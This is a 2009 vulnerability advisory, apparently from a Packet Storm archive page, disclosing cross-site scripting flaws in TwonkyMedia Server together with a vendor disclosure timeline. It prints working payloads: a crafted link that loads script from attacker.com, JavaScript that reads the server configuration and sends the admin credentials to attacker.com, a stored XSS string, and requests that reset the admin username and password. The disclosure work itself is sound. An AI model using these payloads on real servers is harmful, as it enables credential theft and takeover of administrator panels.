exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TwonkyMedia Server Cross Site Scripting

TwonkyMedia Server Cross Site Scripting
Posted Oct 23, 2009
Authored by Davide Canali

TwonkyMedia Server versions 4.4.17 and below and 5.0.65 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | b29607bfdc755fb015da169165ecd5370a7778e308e248f7ed2a9897ca7a2cf6

TwonkyMedia Server Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
Title: TwonkyMedia Server Multiple Cross-Site Scripting Vulnerabilities

Product: TwonkyMedia Server
Vendor: TwonkyMedia (PacketVideo Corporation), https://www.twonkymedia.com

Author: Davide Canali
E-mail: davide (at) davidecanali (dot) com

Date: 2009-10-21
===========================================================================

1. BACKGROUND:

TwonkyMedia Server is a DLNA-compliant, UPnP AV-compliant software
that allows to share and stream media to hundreds of popular consumer
electronics devices. It is available for Windows, Linux, Macintosh and
for various different architectures.
TwonkyMedia Server is bundled on a variety of CE and NAS devices from
leading manufacturers, including: Buffalo LinkStation, HP Media Vault,
LaCie Ethernet Disk, Philips Streamium music players, Western Digital
Share Space.

2. DESCRIPTION:

TwonkyMedia Server contains multiple Cross-Site Scripting (XSS)
vulnerabilities.
The TwonkyMedia web server fails to adequately sanitize user input
(HTTP request strings and form input); thus, an attacker may be able
to execute arbitrary script code in a victim's browser.

3. DETAILS

Two main vulnerabilities have been found.
The TwonkyMedia server IP address, in the following, is just denoted
as "twonky".

1st VULNERABILITY:
==================

A HTTP GET request at https://twonky:9000/NON-EXISTENT-PAGE results in
a 404 error page containing:

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not
Found</H1>/NON-EXISTENT-PAGE was not found
on this server.</BODY></HTML>

Thus, an attacker could induce the server administrator (victim) in
clicking on a specially crafted link, pointing to:

https://twonky:9000/fake_config_page<script type="text/javascript"
src="https://attacker.com/malicious.js" ></script>

Clicking this link, the victim loads and executes the attacker's script.
An example of this script can be:

xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if(xmlhttp.readyState==4)
{

document.location="https://attacker.com/get.php?data="+escape(xmlhttp.responseText);
}
}
xmlhttp.open("GET","/rpc/get_all",true);
xmlhttp.send(null);

This script allows the attacker to read all the server configuration
variables, including the administrator's username and password.
(The victim, if not already logged on the twonky media server
configuration panel, is asked for username and password)

2nd VULNERABILITY:
==================



Form inputs are not well validated, so an attacker can even run a
Stored Cross-Site Scripting. Most of the pages of the management
interface are vulnerable.
As an example, writing the following string in one of the "Content
Locations" fields in the "Sharing" setup page results in a Stored XSS,
which can be exploited by a malicious user every time the victim
visits the config page, once infected:

Directory" /><script> alert('stored!');</script><br

In this way, the page can arbitrarily and permanently be modified by
an attacker, who can inject any kind of content in it.


In addition, leveraging one of these vulnerabilities, an attacker can
modify any server configuration parameter. As an example, to modify
the administrator username and password once the victim visits the
page, it is sufficient to include a script that sends 2 requests at:

https://twonky:9000/rpc/set_option?accessuser=NEWUSER
https://twonky:9000/rpc/set_option?accesspwd=NEWPASSWORD

4. AFFECTED PRODUCTS

1st Vulnerability:
==================
TwonkyMedia Server 4.4.17 and prior versions
TwonkyMedia Server 5.0.65 and prior versions

This vulnerability has been fixed on versions 4.4.18+, 5.0.66+, and 5.1.X.

2nd Vulnerability:
==================
At this date, all versions of TwonkyMedia Server are still vulnerable.

5. SOLUTIONS

To fix the 1st vulnerability, upgrade to the latest version of
TwonkyMedia Server. Latest builds are available at:
https://twonkyforum.com/viewtopic.php?f=2&t=6678

6. DISCLOSURE TIMELINE

2009-06-01: Vendor notified
2009-06-08: Vendor response
2009-06-10: Status update from the development team
2009-06-10: Sent email stating that I'll publish the advisory once new
versions are released
2009-10-06: New releases checked; 2nd vulnerability was not fixed.
Vendor notified
2009-10-21: No response received; release of this advisory

===========================================================================
Davide Canali
davide (at) davidecanali (dot) com


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - https://enigmail.mozdev.org

iEYEARECAAYFAkrfQs4ACgkQ6yrfzQzWVMGQLwCbBgCWYoXIYWD3qkHlqtRaSs/a
g8oAn392UxQB9SvPJf77kfnn4zA1zbf5
=SY7o
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close